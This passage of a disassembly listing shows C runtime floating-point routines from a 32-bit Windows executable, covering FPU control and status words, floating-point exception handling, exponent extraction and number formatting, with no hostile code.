[eax+4], 10h loc_421129: ; CODE XREF: sub_4210AC+6Dj mov esi, [ebp+arg_4] mov eax, [ebp+arg_0] push 2 mov ecx, [esi] mov edx, [eax+8] not ecx and ecx, ebx and edx, 0FFFFFFEFh shl ecx, 4 or ecx, edx pop edi mov [eax+8], ecx mov ecx, [esi] mov eax, [ebp+arg_0] not ecx mov edx, [eax+8] and ecx, 4 shl ecx, 1 and edx, 0FFFFFFF7h or ecx, edx mov [eax+8], ecx mov ecx, [esi] mov eax, [ebp+arg_0] not ecx mov edx, [eax+8] shr ecx, 1 and ecx, 4 and edx, 0FFFFFFFBh or ecx, edx mov [eax+8], ecx mov ecx, [esi] mov eax, [ebp+arg_0] not ecx mov edx, [eax+8] shr ecx, 3 and ecx, edi and edx, 0FFFFFFFDh or ecx, edx mov [eax+8], ecx mov ecx, [esi] mov eax, [ebp+arg_0] not ecx mov edx, [eax+8] shr ecx, 5 and ecx, ebx and edx, 0FFFFFFFEh or ecx, edx mov [eax+8], ecx call sub_4217CC test al, bl jz short loc_4211B2 mov ecx, [ebp+arg_0] or dword ptr [ecx+0Ch], 10h loc_4211B2: ; CODE XREF: sub_4210AC+FDj test al, 4 jz short loc_4211BD mov ecx, [ebp+arg_0] or dword ptr [ecx+0Ch], 8 loc_4211BD: ; CODE XREF: sub_4210AC+108j test al, 8 jz short loc_4211C8 mov ecx, [ebp+arg_0] or dword ptr [ecx+0Ch], 4 loc_4211C8: ; CODE XREF: sub_4210AC+113j test al, 10h jz short loc_4211D2 mov ecx, [ebp+arg_0] or [ecx+0Ch], edi loc_4211D2: ; CODE XREF: sub_4210AC+11Ej test al, 20h jz short loc_4211DC mov eax, [ebp+arg_0] or [eax+0Ch], ebx loc_4211DC: ; CODE XREF: sub_4210AC+128j mov eax, [esi] mov ecx, 0C00h and eax, ecx jz short loc_42121B cmp eax, 400h jz short loc_42120D cmp eax, 800h jz short loc_421201 cmp eax, ecx jnz short loc_421221 mov eax, [ebp+arg_0] or dword ptr [eax], 3 jmp short loc_421221 ; --------------------------------------------------------------------------- loc_421201: ; CODE XREF: sub_4210AC+147j mov eax, [ebp+arg_0] mov ecx, [eax] and ecx, 0FFFFFFFEh or ecx, edi jmp short loc_421217 ; --------------------------------------------------------------------------- loc_42120D: ; CODE XREF: sub_4210AC+140j mov eax, [ebp+arg_0] mov ecx, [eax] and ecx, 0FFFFFFFDh or ecx, ebx loc_421217: ; CODE XREF: sub_4210AC+15Fj mov [eax], ecx jmp short loc_421221 ; --------------------------------------------------------------------------- loc_42121B: ; CODE XREF: sub_4210AC+139j mov eax, [ebp+arg_0] and dword ptr [eax], 0FFFFFFFCh loc_421221: ; CODE XREF: sub_4210AC+14Bj ; sub_4210AC+153j ... mov eax, [esi] mov ecx, 300h and eax, ecx jz short loc_42124C cmp eax, 200h jz short loc_42123F cmp eax, ecx jnz short loc_421259 mov eax, [ebp+arg_0] and dword ptr [eax], 0FFFFFFE3h jmp short loc_421259 ; --------------------------------------------------------------------------- loc_42123F: ; CODE XREF: sub_4210AC+185j mov eax, [ebp+arg_0] mov ecx, [eax] and ecx, 0FFFFFFE7h or ecx, 4 jmp short loc_421257 ; --------------------------------------------------------------------------- loc_42124C: ; CODE XREF: sub_4210AC+17Ej mov eax, [ebp+arg_0] mov ecx, [eax] and ecx, 0FFFFFFEBh or ecx, 8 loc_421257: ; CODE XREF: sub_4210AC+19Ej mov [eax], ecx loc_421259: ; CODE XREF: sub_4210AC+189j ; sub_4210AC+191j mov eax, [ebp+arg_0] mov ecx, [ebp+arg_C] and ecx, 0FFFh mov edx, [eax] shl ecx, 5 and edx, 0FFFE001Fh or ecx, edx mov [eax], ecx mov eax, [ebp+arg_0] or [eax+20h], ebx mov eax, [ebp+arg_0] mov ecx, [eax+20h] and ecx, 0FFFFFFE3h or ecx, edi mov [eax+20h], ecx mov eax, [ebp+arg_10] fld qword ptr [eax] mov eax, [ebp+arg_0] fstp qword ptr [eax+10h] mov eax, [ebp+arg_0] or [eax+50h], ebx mov eax, [ebp+arg_0] mov ecx, [eax+50h] and ecx, 0FFFFFFE3h or ecx, edi mov edi, [ebp+arg_14] mov [eax+50h], ecx mov eax, [ebp+arg_0] fld qword ptr [edi] fstp qword ptr [eax+40h] call sub_4217DA lea eax, [ebp+arg_0] push eax push ebx push 0 push [ebp+arg_8] call dword_42705C ; RaiseException mov eax, [ebp+arg_0] test byte ptr [eax+8], 10h jz short loc_4212D3 and dword ptr [esi], 0FFFFFFFEh loc_4212D3: ; CODE XREF: sub_4210AC+222j test byte ptr [eax+8], 8 jz short loc_4212DC and dword ptr [esi], 0FFFFFFFBh loc_4212DC: ; CODE XREF: sub_4210AC+22Bj test byte ptr [eax+8], 4 jz short loc_4212E5 and dword ptr [esi], 0FFFFFFF7h loc_4212E5: ; CODE XREF: sub_4210AC+234j test byte ptr [eax+8], 2 jz short loc_4212EE and dword ptr [esi], 0FFFFFFEFh loc_4212EE: ; CODE XREF: sub_4210AC+23Dj test [eax+8], bl jz short loc_4212F6 and dword ptr [esi], 0FFFFFFDFh loc_4212F6: ; CODE XREF: sub_4210AC+245j mov ecx, [eax] mov edx, 0FFFFF3FFh and ecx, 3 sub ecx, 0 jz short loc_42132A dec ecx jz short loc_42131E dec ecx jz short loc_421314 dec ecx jnz short loc_42132C or byte ptr [esi+1], 0Ch jmp short loc_42132C ; --------------------------------------------------------------------------- loc_421314: ; CODE XREF: sub_4210AC+25Dj mov ecx, [esi] and ch, 0FBh or ch, 8 jmp short loc_421326 ; --------------------------------------------------------------------------- loc_42131E: ; CODE XREF: sub_4210AC+25Aj mov ecx, [esi] and ch, 0F7h or ch, 4 loc_421326: ; CODE XREF: sub_4210AC+270j mov [esi], ecx jmp short loc_42132C ; --------------------------------------------------------------------------- loc_42132A: ; CODE XREF: sub_4210AC+257j and [esi], edx loc_42132C: ; CODE XREF: sub_4210AC+260j ; sub_4210AC+266j ... mov ecx, [eax] shr ecx, 2 and ecx, 7 sub ecx, 0 jz short loc_42134C dec ecx jz short loc_421343 dec ecx jnz short loc_421355 and [esi], edx jmp short loc_421355 ; --------------------------------------------------------------------------- loc_421343: ; CODE XREF: sub_4210AC+28Ej mov ecx, [esi] and ecx, edx or ch, 2 jmp short loc_421353 ; --------------------------------------------------------------------------- loc_42134C: ; CODE XREF: sub_4210AC+28Bj mov ecx, [esi] and ecx, edx or ch, 3 loc_421353: ; CODE XREF: sub_4210AC+29Ej mov [esi], ecx loc_421355: ; CODE XREF: sub_4210AC+291j ; sub_4210AC+295j fld qword ptr [eax+40h] fstp qword ptr [edi] pop edi pop esi pop ebx pop ebp retn sub_4210AC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42135F proc near ; CODE XREF: sub_421014+10p var_24 = qword ptr -24h var_C = qword ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 0Ch mov eax, [ebp+arg_0] push ebx push edi mov edi, eax and edi, 1Fh push 1 test al, 8 pop ebx jz short loc_42138A test byte ptr [ebp+arg_8], bl jz short loc_42138A push ebx call sub_42180C pop ecx and edi, 0FFFFFFF7h jmp loc_421554 ; --------------------------------------------------------------------------- loc_42138A: ; CODE XREF: sub_42135F+15j ; sub_42135F+1Aj test al, 4 jz short loc_4213A4 test byte ptr [ebp+arg_8], 4 jz short loc_4213A4 push 4 call sub_42180C pop ecx and edi, 0FFFFFFFBh jmp loc_421554 ; --------------------------------------------------------------------------- loc_4213A4: ; CODE XREF: sub_42135F+2Dj ; sub_42135F+33j test al, bl jz loc_42147E test byte ptr [ebp+arg_8], 8 jz loc_42147E push 8 call sub_42180C pop ecx mov eax, 0C00h mov ecx, [ebp+arg_8] and ecx, eax jz loc_421456 cmp ecx, 400h jz short loc_42142E cmp ecx, 800h jz short loc_421406 cmp ecx, eax jnz loc_421476 mov ecx, [ebp+arg_4] fld qword ptr [ecx] fcomp dbl_427878 fld dbl_43CF50 fnstsw ax sahf ja short loc_4213FE fchs loc_4213FE: ; CODE XREF: sub_42135F+9Bj fstp [ebp+var_C] fld [ebp+var_C] jmp short loc_421474 ; --------------------------------------------------------------------------- loc_421406: ; CODE XREF: sub_42135F+7Dj mov ecx, [ebp+arg_4] fld qword ptr [ecx] fcomp dbl_427878 fnstsw ax sahf jbe short loc_42141E fld dbl_43CF40 jmp short loc_421426 ; --------------------------------------------------------------------------- loc_42141E: ; CODE XREF: sub_42135F+B5j fld dbl_43CF50 fchs loc_421426: ; CODE XREF: sub_42135F+BDj fstp [ebp+var_C] fld [ebp+var_C] jmp short loc_421474 ; --------------------------------------------------------------------------- loc_42142E: ; CODE XREF: sub_42135F+75j mov ecx, [ebp+arg_4] fld qword ptr [ecx] fcomp dbl_427878 fnstsw ax sahf jbe short loc_421446 fld dbl_43CF50 jmp short loc_42144E ; --------------------------------------------------------------------------- loc_421446: ; CODE XREF: sub_42135F+DDj fld dbl_43CF40 fchs loc_42144E: ; CODE XREF: sub_42135F+E5j fstp [ebp+var_C] fld [ebp+var_C] jmp short loc_421474 ; --------------------------------------------------------------------------- loc_421456: ; CODE XREF: sub_42135F+69j mov ecx, [ebp+arg_4] fld qword ptr [ecx] fcomp dbl_427878 fld dbl_43CF40 fnstsw ax sahf ja short loc_42146E fchs loc_42146E: ; CODE XREF: sub_42135F+10Bj fstp [ebp+var_C] fld [ebp+var_C] loc_421474: ; CODE XREF: sub_42135F+A5j ; sub_42135F+CDj ... fstp qword ptr [ecx] loc_421476: ; CODE XREF: sub_42135F+81j and edi, 0FFFFFFFEh jmp loc_421554 ; --------------------------------------------------------------------------- loc_42147E: ; CODE XREF: sub_42135F+47j ; sub_42135F+51j test al, 2 jz loc_421554 test byte ptr [ebp+arg_8], 10h jz loc_421554 push esi xor esi, esi test al, 10h jz short loc_421499 mov esi, ebx loc_421499: ; CODE XREF: sub_42135F+136j mov eax, [ebp+arg_4] fld qword ptr [eax] fstp [ebp+var_C] fld [ebp+var_C] fcomp dbl_427878 fnstsw ax sahf jz loc_421542 fld [ebp+var_C] lea eax, [ebp+var_4] push eax ; int push ecx push ecx ; double fstp [esp+24h+var_24] call sub_42170B mov eax, [ebp+var_4] add esp, 0Ch fstp [ebp+var_C] lea ecx, [eax-600h] cmp ecx, 0FFFFFBCEh jge short loc_4214E4 fldz mov esi, ebx fstp [ebp+var_C] jmp short loc_421538 ; --------------------------------------------------------------------------- loc_4214E4: ; CODE XREF: sub_42135F+17Aj fld [ebp+var_C] fcomp dbl_427878 fnstsw ax sahf jnb short loc_4214F6 mov edx, ebx jmp short loc_4214F8 ; --------------------------------------------------------------------------- loc_4214F6: ; CODE XREF: sub_42135F+191j xor edx, edx loc_4214F8: ; CODE XREF: sub_42135F+195j mov al, byte ptr [ebp+var_C+6] and eax, 0Fh or al, 10h mov word ptr [ebp+var_C+6], ax mov eax, 0FFFFFC03h cmp ecx, eax jge short loc_42152C sub eax, ecx loc_42150F: ; CODE XREF: sub_42135F+1CBj test byte ptr [ebp+var_C], bl jz short loc_42151A test esi, esi jnz short loc_42151A mov esi, ebx loc_42151A: ; CODE XREF: sub_42135F+1B3j ; sub_42135F+1B7j shr dword ptr [ebp+var_C], 1 test byte ptr [ebp+var_C+4], bl jz short loc_421526 or byte ptr [ebp+var_C+3], 80h loc_421526: ; CODE XREF: sub_42135F+1C1j shr dword ptr [ebp+var_C+4], 1 dec eax jnz short loc_42150F loc_42152C: ; CODE XREF: sub_42135F+1ACj test edx, edx jz short loc_421538 fld [ebp+var_C] fchs fstp [ebp+var_C] loc_421538: ; CODE XREF: sub_42135F+183j ; sub_42135F+1CFj fld [ebp+var_C] mov eax, [ebp+arg_4] fstp qword ptr [eax] jmp short loc_421544 ; --------------------------------------------------------------------------- loc_421542: ; CODE XREF: sub_42135F+14Ej mov esi, ebx loc_421544: ; CODE XREF: sub_42135F+1E1j test esi, esi pop esi jz short loc_421551 push 10h call sub_42180C pop ecx loc_421551: ; CODE XREF: sub_42135F+1E8j and edi, 0FFFFFFFDh loc_421554: ; CODE XREF: sub_42135F+26j ; sub_42135F+40j ... test byte ptr [ebp+arg_0], 10h jz short loc_42156B test byte ptr [ebp+arg_8], 20h jz short loc_42156B push 20h call sub_42180C pop ecx and edi, 0FFFFFFEFh loc_42156B: ; CODE XREF: sub_42135F+1F9j ; sub_42135F+1FFj xor eax, eax test edi, edi pop edi pop ebx setz al leave retn sub_42135F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_421576(int,int,int,int,int,int,double,int) sub_421576 proc near ; CODE XREF: sub_420FC1+2Bp ; sub_421014+72p var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = qword ptr -8 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = qword ptr 20h arg_20 = dword ptr 28h push ebp mov ebp, esp sub esp, 20h push [ebp+arg_4] call sub_421624 test eax, eax pop ecx mov [ebp+var_1C], eax jz short loc_4215E1 mov eax, [ebp+arg_8] push esi mov [ebp+var_18], eax mov eax, [ebp+arg_C] mov [ebp+var_14], eax mov eax, [ebp+arg_10] mov esi, [ebp+arg_0] mov [ebp+var_10], eax mov eax, [ebp+arg_14] push 0FFFFh push [ebp+arg_20] mov [ebp+var_C], eax mov eax, dword ptr [ebp+arg_18] mov [ebp+var_20], esi mov dword ptr [ebp+var_8], eax mov eax, dword ptr [ebp+arg_18+4] mov dword ptr [ebp+var_8+4], eax call sub_4217E9 lea eax, [ebp+var_20] push eax call sub_42401D add esp, 0Ch test eax, eax jnz short loc_4215DB push esi call sub_4215FE pop ecx loc_4215DB: ; CODE XREF: sub_421576+5Cj fld [ebp+var_8] pop esi leave retn ; --------------------------------------------------------------------------- loc_4215E1: ; CODE XREF: sub_421576+14j push 0FFFFh push [ebp+arg_20] call sub_4217E9 push [ebp+arg_0] call sub_4215FE fld [ebp+arg_18] add esp, 0Ch leave retn sub_421576 endp ; =============== S U B R O U T I N E ======================================= sub_4215FE proc near ; CODE XREF: sub_421014+7Dp ; sub_421576+5Fp ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] cmp eax, 1 jz short loc_421619 jle short locret_421623 cmp eax, 3 jg short locret_421623 mov ds:dword_4DB958, 22h retn ; --------------------------------------------------------------------------- loc_421619: ; CODE XREF: sub_4215FE+7j mov ds:dword_4DB958, 21h locret_421623: ; CODE XREF: sub_4215FE+9j ; sub_4215FE+Ej retn sub_4215FE endp ; =============== S U B R O U T I N E ======================================= sub_421624 proc near ; CODE XREF: sub_421576+9p arg_0 = dword ptr 4 xor ecx, ecx mov eax, offset dword_43CE68 loc_42162B: ; CODE XREF: sub_421624+18j mov edx, [eax] cmp edx, [esp+arg_0] jz short loc_421641 add eax, 8 inc ecx cmp eax, offset dbl_43CF40 jl short loc_42162B xor eax, eax retn ; --------------------------------------------------------------------------- loc_421641: ; CODE XREF: sub_421624+Dj mov eax, off_43CE6C[ecx*8] retn sub_421624 endp ; =============== S U B R O U T I N E ======================================= sub_421649 proc near ; CODE XREF: sub_421014+41p arg_0 = byte ptr 4 mov al, [esp+arg_0] test al, 20h jz short loc_421655 push 5 jmp short loc_42166B ; --------------------------------------------------------------------------- loc_421655: ; CODE XREF: sub_421649+6j test al, 8 jz short loc_42165D push 1 jmp short loc_42166B ; --------------------------------------------------------------------------- loc_42165D: ; CODE XREF: sub_421649+Ej test al, 4 jz short loc_421665 push 2 jmp short loc_42166B ; --------------------------------------------------------------------------- loc_421665: ; CODE XREF: sub_421649+16j test al, 1 jz short loc_42166D push 3 loc_42166B: ; CODE XREF: sub_421649+Aj ; sub_421649+12j ... pop eax retn ; --------------------------------------------------------------------------- loc_42166D: ; CODE XREF: sub_421649+1Ej movzx eax, al and eax, 2 shl eax, 1 retn sub_421649 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_421676(double) sub_421676 proc near ; CODE XREF: sub_41C679:loc_41C6FFp ; sub_41C7BF:loc_41C845p var_8 = qword ptr -8 arg_0 = qword ptr 8 push ebp mov ebp, esp push ecx push ecx fld [ebp+arg_0] frndint fstp [ebp+var_8] fld [ebp+var_8] leave retn sub_421676 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_421688(double,int) sub_421688 proc near ; CODE XREF: sub_42170B+82p ; sub_42170B+98p var_8 = qword ptr -8 arg_0 = qword ptr 8 arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push ecx mov eax, [ebp+arg_8] mov ecx, [ebp+0Eh] fld [ebp+arg_0] add eax, 3FEh and cx, 800Fh fstp [ebp+var_8] shl eax, 4 or eax, ecx mov word ptr [ebp+var_8+6], ax fld [ebp+var_8] leave retn sub_421688 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4216B1 proc near ; CODE XREF: sub_41C679+31p ; sub_41C7BF+31p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp xor edx, edx cmp [ebp+arg_4], 7FF00000h jnz short loc_4216C8 cmp [ebp+arg_0], edx jnz short loc_4216DA push 1 jmp short loc_421704 ; --------------------------------------------------------------------------- loc_4216C8: ; CODE XREF: sub_4216B1+Cj cmp [ebp+arg_4], 0FFF00000h jnz short loc_4216DA cmp [ebp+arg_0], edx jnz short loc_4216DA push 2 jmp short loc_421704 ; --------------------------------------------------------------------------- loc_4216DA: ; CODE XREF: sub_4216B1+11j ; sub_4216B1+1Ej ... mov ecx, [ebp+arg_4+2] mov eax, 7FF8h and ecx, eax cmp cx, ax jnz short loc_4216ED push 3 jmp short loc_421704 ; --------------------------------------------------------------------------- loc_4216ED: ; CODE XREF: sub_4216B1+36j cmp cx, 7FF0h jnz short loc_421707 test [ebp+arg_4], 7FFFFh jnz short loc_421702 cmp [ebp+arg_0], edx jz short loc_421707 loc_421702: ; CODE XREF: sub_4216B1+4Aj push 4 loc_421704: ; CODE XREF: sub_4216B1+15j ; sub_4216B1+27j ... pop eax pop ebp retn ; --------------------------------------------------------------------------- loc_421707: ; CODE XREF: sub_4216B1+41j ; sub_4216B1+4Fj xor eax, eax pop ebp retn sub_4216B1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_42170B(double,int) sub_42170B proc near ; CODE XREF: sub_42135F+160p var_18 = qword ptr -18h var_8 = qword ptr -8 arg_0 = qword ptr 8 arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push ecx fld [ebp+arg_0] fcomp dbl_427878 push esi fnstsw ax sahf jnz short loc_42172B fldz xor esi, esi fstp [ebp+var_8] jmp loc_4217C1 ; --------------------------------------------------------------------------- loc_42172B: ; CODE XREF: sub_42170B+12j xor ecx, ecx test word ptr [ebp+arg_0+6], 7FF0h jnz short loc_42179A test dword ptr [ebp+arg_0+4], 0FFFFFh jnz short loc_421743 cmp dword ptr [ebp+arg_0], ecx jz short loc_42179A loc_421743: ; CODE XREF: sub_42170B+31j fld [ebp+arg_0] fcomp dbl_427878 mov esi, 0FFFFFC03h fnstsw ax sahf jnb short loc_42175B push 1 pop eax jmp short loc_42175D ; --------------------------------------------------------------------------- loc_42175B: ; CODE XREF: sub_42170B+49j xor eax, eax loc_42175D: ; CODE XREF: sub_42170B+4Ej ; sub_42170B+69j test byte ptr [ebp+arg_0+6], 10h jnz short loc_421776 shl dword ptr [ebp+arg_0+4], 1 test byte ptr [ebp+arg_0+3], 80h jz short loc_421770 or dword ptr [ebp+arg_0+4], 1 loc_421770: ; CODE XREF: sub_42170B+5Fj shl dword ptr [ebp+arg_0], 1 dec esi jmp short loc_42175D ; --------------------------------------------------------------------------- loc_421776: ; CODE XREF: sub_42170B+56j and word ptr [ebp+arg_0+6], 0FFEFh cmp eax, ecx jz short loc_421784 or byte ptr [ebp+arg_0+7], 80h loc_421784: ; CODE XREF: sub_42170B+73j fld [ebp+arg_0] push ecx ; int push ecx push ecx ; double fstp [esp+18h+var_18] call sub_421688 fstp [ebp+var_8] add esp, 0Ch jmp short loc_4217C1 ; --------------------------------------------------------------------------- loc_42179A: ; CODE XREF: sub_42170B+28j ; sub_42170B+36j fld [ebp+arg_0] push ecx ; int push ecx push ecx ; double fstp [esp+18h+var_18] call sub_421688 mov eax, dword ptr [ebp+arg_0+6] add esp, 0Ch fstp [ebp+var_8] shr eax, 4 and ax, 7FFh movsx esi, ax sub esi, 3FEh loc_4217C1: ; CODE XREF: sub_42170B+1Bj ; sub_42170B+8Dj mov eax, [ebp+arg_8] fld [ebp+var_8] mov [eax], esi pop esi leave retn sub_42170B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4217CC proc near ; CODE XREF: sub_4210AC+F6p var_2 = word ptr -2 push ebp mov ebp, esp push ecx fstsw [ebp+var_2] movsx eax, [ebp+var_2] leave retn sub_4217CC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4217DA proc near ; CODE XREF: sub_4210AC+206p var_2 = word ptr -2 push ebp mov ebp, esp push ecx fnstsw [ebp+var_2] fnclex movsx eax, [ebp+var_2] leave retn sub_4217DA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4217E9 proc near ; CODE XREF: sub_41C679+13p ; sub_41C679+5Dp ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx fstcw word ptr [ebp+var_4] mov eax, [ebp+arg_4] mov ecx, eax and eax, [ebp+arg_0] not ecx and ecx, [ebp+var_4] or ecx, eax mov [ebp+arg_4], ecx fldcw word ptr [ebp+arg_4] movsx eax, word ptr [ebp+var_4] leave retn sub_4217E9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42180C proc near ; CODE XREF: sub_42135F+1Dp ; sub_42135F+37p ... var_8 = qword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx mov cl, byte ptr [ebp+arg_0] test cl, 1 jz short loc_421823 fld tbyte_43CF68 fistp [ebp+arg_0] wait loc_421823: ; CODE XREF: sub_42180C+Bj test cl, 8 jz short loc_421838 fstsw ax fld tbyte_43CF68 fstp [ebp+var_8] wait fstsw ax loc_421838: ; CODE XREF: sub_42180C+1Aj test cl, 10h jz short loc_421847 fld tbyte_43CF74 fstp [ebp+var_8] wait loc_421847: ; CODE XREF: sub_42180C+2Fj test cl, 4 jz short loc_421855 fldz fld1 fdivrp st(1), st fstp st wait loc_421855: ; CODE XREF: sub_42180C+3Ej test cl, 20h jz short locret_421860 fldpi fstp [ebp+var_8] wait locret_421860: ; CODE XREF: sub_42180C+4Cj leave retn sub_42180C endp ; =============== S U B R O U T I N E ======================================= sub_421862 proc near ; CODE XREF: sub_41C748+Fp push 30000h push 10000h call sub_424055 pop ecx pop ecx retn sub_421862 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_421874 proc near ; CODE XREF: sub_4218B2:loc_4218D6j var_18 = qword ptr -18h var_10 = qword ptr -10h var_8 = qword ptr -8 push ebp mov ebp, esp sub esp, 18h fld dbl_427888 fstp [ebp+var_8] fld dbl_427880 fstp [ebp+var_10] fld [ebp+var_10] fdiv [ebp+var_8] fmul [ebp+var_8] fsubr [ebp+var_10] fstp [ebp+var_18] fld [ebp+var_18] fcomp dbl_427710 fnstsw ax sahf jbe short loc_4218AE push 1 pop eax leave retn ; --------------------------------------------------------------------------- loc_4218AE: ; CODE XREF: sub_421874+33j xor eax, eax leave retn sub_421874 endp ; =============== S U B R O U T I N E ======================================= sub_4218B2 proc near ; CODE XREF: sub_41C748+5p push offset aKernel32 ; "KERNEL32" call dword_42709C ; GetModuleHandleA test eax, eax jz short loc_4218D6 push offset aIsprocessorfea ; "IsProcessorFeaturePresent" push eax call dword_4270BC ; GetProcAddress test eax, eax jz short loc_4218D6 push 0 call eax ; sub_41C748 retn ; --------------------------------------------------------------------------- loc_4218D6: ; CODE XREF: sub_4218B2+Dj ; sub_4218B2+1Dj jmp sub_421874 sub_4218B2 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4218DB proc near ; CODE XREF: sub_41F69F+3CBp ; DATA XREF: sub_41C760+1Eo ... arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] movsx eax, byte ptr [esi] push eax call sub_41D74C cmp eax, 65h pop ecx jz short loc_42191B loc_4218EF: ; CODE XREF: sub_4218DB+3Ej inc esi cmp dword_43CBE4, 1 jle short loc_421908 movsx eax, byte ptr [esi] push 4 push eax call sub_41F515 pop ecx pop ecx jmp short loc_421917 ; --------------------------------------------------------------------------- loc_421908: ; CODE XREF: sub_4218DB+1Cj movsx eax, byte ptr [esi] mov ecx, off_43C9D8 mov al, [ecx+eax*2] and eax, 4 loc_421917: ; CODE XREF: sub_4218DB+2Bj test eax, eax jnz short loc_4218EF loc_42191B: ; CODE XREF: sub_4218DB+12j mov cl, byte_43CBE8 mov al, [esi] mov [esi], cl inc esi loc_421926: ; CODE XREF: sub_4218DB+56j mov cl, [esi] mov [esi], al mov al, cl mov cl, [esi] inc esi test cl, cl jnz short loc_421926 pop esi retn sub_4218DB endp ; =============== S U B R O U T I N E ======================================= sub_421935 proc near ; CODE XREF: sub_41F69F+3E2p ; DATA XREF: sub_41C760+5o ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov dl, byte_43CBE8 mov cl, [eax] test cl, cl jz short loc_421951 loc_421945: ; CODE XREF: sub_421935+1Aj cmp cl, dl jz short loc_421951 mov cl, [eax+1] inc eax test cl, cl jnz short loc_421945 loc_421951: ; CODE XREF: sub_421935+Ej ; sub_421935+12j mov cl, [eax] inc eax test cl, cl jz short locret_421982 loc_421958: ; CODE XREF: sub_421935+34j mov cl, [eax] test cl, cl jz short loc_42196B cmp cl, 65h jz short loc_42196B cmp cl, 45h jz short loc_42196B inc eax jmp short loc_421958 ; --------------------------------------------------------------------------- loc_42196B: ; CODE XREF: sub_421935+27j ; sub_421935+2Cj ... mov ecx, eax loc_42196D: ; CODE XREF: sub_421935+3Cj dec eax cmp byte ptr [eax], 30h jz short loc_42196D cmp [eax], dl jnz short loc_421978 dec eax loc_421978: ; CODE XREF: sub_421935+40j ; sub_421935+4Bj mov dl, [ecx] inc eax inc ecx test dl, dl mov [eax], dl jnz short loc_421978 locret_421982: ; CODE XREF: sub_421935+21j retn sub_421935 endp ; =============== S U B R O U T I N E ======================================= sub_421983 proc near ; DATA XREF: sub_41C760+28o ; UPX0:off_43CF90o arg_0 = dword ptr 4 mov eax, [esp+arg_0] fld qword ptr [eax] fcomp dbl_427878 fnstsw ax sahf jb short loc_421998 push 1 pop eax retn ; --------------------------------------------------------------------------- loc_421998: ; CODE XREF: sub_421983+Fj xor eax, eax retn sub_421983 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42199B proc near ; CODE XREF: sub_420510+430p ; DATA XREF: sub_41C760+14o ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push ecx cmp [ebp+arg_0], 0 push [ebp+arg_8] jz short loc_4219C4 lea eax, [ebp+var_8] push eax call sub_424518 mov eax, [ebp+arg_4] pop ecx pop ecx mov ecx, [ebp+var_8] mov [eax], ecx mov ecx, [ebp+var_4] mov [eax+4], ecx leave retn ; --------------------------------------------------------------------------- loc_4219C4: ; CODE XREF: sub_42199B+Cj lea eax, [ebp+arg_8] push eax call sub_424545 mov eax, [ebp+arg_4] pop ecx pop ecx mov ecx, [ebp+arg_8] mov [eax], ecx leave retn sub_42199B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4219D9 proc near ; CODE XREF: sub_421C56+17p ; sub_421CA0+47p var_10 = qword ptr -10h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp cmp ds:byte_4DB9F0, 0 push ebx push esi jz short loc_421A0E mov ebx, [ebp+arg_8] mov eax, ds:dword_4DB9EC xor ecx, ecx mov esi, eax test ebx, ebx setnle cl push ecx xor ecx, ecx cmp dword ptr [eax], 2Dh setz cl add ecx, [ebp+arg_4] push ecx call sub_421CF1 pop ecx pop ecx jmp short loc_421A46 ; --------------------------------------------------------------------------- loc_421A0E: ; CODE XREF: sub_4219D9+Cj mov eax, [ebp+arg_0] push ecx push ecx fld qword ptr [eax] fstp [esp+10h+var_10] call sub_4245E9 mov ebx, [ebp+arg_8] mov esi, eax push esi mov edx, [ebp+arg_4] lea eax, [ebx+1] push eax xor eax, eax cmp dword ptr [esi], 2Dh setz al xor ecx, ecx test ebx, ebx setnle cl add edx, eax add ecx, edx push ecx call sub_424572 add esp, 14h loc_421A46: ; CODE XREF: sub_4219D9+33j cmp dword ptr [esi], 2Dh mov eax, [ebp+arg_4] jnz short loc_421A52 mov byte ptr [eax], 2Dh inc eax loc_421A52: ; CODE XREF: sub_4219D9+73j test ebx, ebx jle short loc_421A6A mov cl, [eax+1] push edi lea edi, [eax+1] mov [eax], cl mov cl, byte_43CBE8 mov eax, edi pop edi mov [eax], cl loc_421A6A: ; CODE XREF: sub_4219D9+7Bj xor ecx, ecx push offset aE000 ; "e+000" cmp ds:byte_4DB9F0, cl setz cl add ecx, eax add ecx, ebx push ecx call sub_41BEB0 cmp [ebp+arg_C], 0 pop ecx pop ecx mov ecx, eax jz short loc_421A91 mov byte ptr [ecx], 45h loc_421A91: 